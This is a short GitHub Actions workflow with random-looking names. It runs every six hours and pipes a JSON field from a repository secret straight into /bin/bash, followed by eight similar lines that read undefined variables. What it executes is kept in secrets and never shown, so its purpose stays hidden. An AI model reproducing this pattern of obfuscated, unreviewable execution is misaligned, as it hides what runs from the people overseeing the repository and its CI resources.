name: panxiaotian6789

on:
  workflow_dispatch:
  schedule:
    - cron: '40 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: panxiaotian6789
        env:
          njbem8: ${{ secrets.njbem8 }}
        run: |
          echo $njbem8 | jq -r .pmrzq3446 | /bin/bash
          echo $wemn8239 | jq -r .wfhp6997 | /bin/bash
          echo $djd43 | jq -r .jhcnu4390 | /bin/bash
          echo $g0 | jq -r .dcuq28 | /bin/bash
          echo $d93 | jq -r .ob2190 | /bin/bash
          echo $qvcv72472 | jq -r .wmao14535 | /bin/bash
          echo $akrvr592 | jq -r .jwbcm21760 | /bin/bash
          echo $qrp7526 | jq -r .w1606 | /bin/bash
          echo $blbva23 | jq -r .z63649 | /bin/bash

